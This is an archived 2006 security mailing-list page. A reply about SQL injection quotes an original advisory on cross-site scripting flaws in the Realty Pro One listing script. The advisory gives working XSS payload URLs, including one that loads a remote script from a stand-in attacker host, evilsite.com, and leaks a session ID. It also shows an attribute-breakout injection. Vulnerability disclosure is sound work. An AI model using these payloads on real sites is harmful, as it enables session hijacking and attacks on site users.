Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

RE: Realty Pro One Property Listing Script

from [Krpata, Tyler] Network Security [Permanent Link]
Subject: RE: Realty Pro One Property Listing Script
Date: Thu, 25 May 2006 14:21:50 -0400 
Isn't the SQL injection vulnerability a bit more critical here? 

-----Original Message-----
From: luny@youfucktard.com [mailto:luny@youfucktard.com] 
Sent: Tuesday, May 23, 2006 7:39 PM
To: bugtraq@securityfocus.com
Subject: Realty Pro One Property Listing Script

Realty Pro One

http://realtypro1.2run2.com/index.php


Description:

Realty Pro One is a powerful property listing tool with many features.


Effected files:

searchlookup.php

images.php

index_other.php

request_info.php

?listingid


Exploits & Vulns:


XSS Vulnerability by the listingid variable:


http://www.example.com/listings/?listingid=<SCRIPT%20SRC=http://evilsite
.com/xss.js></SCRIPT>


Also outputs SQL Query error msg:


You have an error in your SQL syntax. Check the manual that corresponds
to your MySQL server version for the right syntax to use near 'This is
remote text via xss.js located at
evilsite.comPHPSESSID=f085540569ca117edda59a119e98fcc4 ORDER BY rl_re



More XSS Vulnerabilities:


http://www.example.com/search/searchlookup.php?propertyid=200 or [XSS]

http://www.example.com/images.php?id=[XSS]

http://www.example.com/listings/index_other.php?listingid=[XSS]


By putting "> and <" infront and behind our script tags:


http://www.example.com/listings/request_info.php?agentid=101005";>[XSS]<"
&listtype=homes&listingid=222003


No version # for this script was given on the website.
[More messages with this same subject...]




<Prev in Thread] Current Thread [Next in Thread>
Previous by Date:  Multiple XSS Vulnerabilities in Tikiwiki 1.9.x, blwood
Next by Date:  Re: [BuHa-Security] DoS Vulnerability in MS IE 6 SP2, ad@heapoverflow.com
Previous by Thread:  Realty Pro One Property Listing Script, luny
Next by Thread:  Bulletin Board Elite-Board v.1.1, luny
Indexes:  [Date] [Thread] [Top] [All Lists]